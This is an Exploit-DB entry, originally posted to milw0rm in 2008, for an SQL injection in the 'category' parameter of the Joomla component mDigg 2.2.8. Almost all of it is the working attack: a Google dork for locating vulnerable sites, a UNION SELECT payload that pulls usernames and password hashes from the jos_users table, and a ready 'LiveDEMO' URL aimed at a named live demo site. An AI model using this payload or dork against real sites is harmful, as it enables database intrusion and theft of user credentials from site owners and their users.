Joomla! Component mDigg 2.2.8 - 'category' SQL Injection

EDB-ID:

7574




Platform:

PHP

Date:

2008-12-24


#############################################################
Joomla Component com_mdigg(category) SQL-injection vulnerability
#############################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[~] Vulnerability :  SQL injection 
#[~] Google Dork   :  inurl:com_mdigg 
--------------------------------------------------
#[!] Name          :  mdigg
#[!] CreationDate  :  10-12-2007
#[!] Author        :  Zhigang Lei
#[!] AuthorEmail   :  zhigang.lei@gmail.com 
#[!] Version       :  2.2.8 
###################################################

Example:
http://localHost/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]


Exploit:
-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*


LiveDEMO:
http://demo15.joomlaapps.com/index.php?option=com_mdigg&act=story_lists&task=view&category=-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*

##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-12-24]